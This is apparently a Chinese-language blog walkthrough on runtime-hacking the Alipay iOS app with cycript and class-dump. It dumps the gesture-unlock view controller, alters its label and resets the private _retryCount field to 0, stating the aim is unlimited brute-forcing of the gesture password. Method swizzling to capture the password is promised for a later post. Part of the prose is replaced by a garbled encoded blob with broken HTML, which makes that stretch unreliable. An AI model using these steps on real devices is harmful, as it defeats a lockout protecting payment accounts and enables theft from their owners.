Hack實戰——解除支付寶app手勢解鎖錯誤次數限制
之前僅僅介紹瞭工具的使用,本文將實踐一下如何利用 cycript 結合 class-dump 結果hack,還要犧牲一下支付寶app。
首先,老套路,取到手勢解鎖界面的View Controller:
cy# var app = [UIApplication sharedApplication] @"" cy# var keyWindow = app.keyWindow @"<UIWindow: 0x16591bd0; frame = (0 0; 320 568); gestureRecognizers = ; layer = >" cy# var root = keyWindow.rootViewController @"" cy# var visible = root.visibleViewController @""
然後,對照class-dump-z結果,來分析 GestureUnlockViewController 有什麼利用價值 :
@interface GestureUnlockViewController : DTViewController {
@private
GestureHeadImageView* _headImageView;
GestureTipLabel* _tipLabel;
GestureInputView* _inputView;
DTButton* _forgetButton;
DTButton* _changeAccountButton;
int _retryCount;
UIView* _guideView;
id _delegate;
}
@property(assign, nonatomic) __weak id delegate;
-(void).cxx_destruct;
-(BOOL)shouldAutorotateToInterfaceOrientation:(int)interfaceOrientation;
-(void)headClicked;
-(void)gestureInputView:(id)view didFinishWithPassword:(id)password;
-(void)gestureInputViewFirstEffectiveTouch:(id)touch;
-(void)alertView:(id)view clickedButtonAtIndex:(int)index;
-(void)actionChangeAccountToLogin;
-(void)actionResetPswBtnClick;
-(void)resetCurrentUser;
-(void)resetPsw;
-(void)viewWillDisappear:(BOOL)view;
-(void)notifyFaceToFacePayReceivedData:(id)facePayReceivedData;
-(void)viewWillAppear:(BOOL)view;
-(void)breakFirstRun;
-(BOOL)isFirstRun;
-(void)guideViewClicked:(id)clicked;
-(void)viewDidLoad;
-(void)viewWillLayoutSubviews;
@end
目測 _tipLabel 是寫賬戶名和提示操作的label,上篇文章我提到過:@private限制不瞭keyPath,現在我們來修改一下支付寶登錄頁的用戶名信息:
cy# [visible setValue:@"Test By yiyaaixuexi" forKeyPath:@"_tipLabel.text"]
vcD48cD7Wp7i2sabK1srGw9zC673iy/jT0LOiytS0zsr9z97WxqOswazQ+LTtNbTOvs3SqtbY0MK1x8K8oaM8YnIgLz7O0s/rveKz/dbYytS94sv4tM7K/bXEz97WxqOst6LP1sHLvMfCvL3iy/i0zsr9tcTA4NDNysdpbnSjrGludCBfcmV0cnlDb3VudCCjrNXi0ru148jDztK63LK7v6rQxKOs0vLOqs7Szt63qM2ouf1LVkPAtNDeuMTG5Na1wcuhozwvcD48cD61q8rHw7vT0LnYz7WjrM7Sv8nS1M2ouf3WuNXrt8POyqO6PC9wPjxwPjwvcD48cHJlIGNsYXNzPQ==”brush:java;”>cy# visible->_retryCount = 0
0
這樣我就能無限制的用程序暴力破解手勢密碼瞭,來計算一下有多少種可能呢?
這個數字對我來說有點大,可是對iPhone5的CPU來說就是小菜一碟瞭~
等一下,密碼格式是什麼呢?
-(void)gestureInputView:(id)view didFinishWithPassword:(id)password;
id類型的密碼,很嚴謹,又給hack帶來不少麻煩呀~
不過沒關系,我們可以利用 Method Swizzling 來打出password到底是什麼,不過呢,貌似可以再寫一篇新文章去介紹瞭……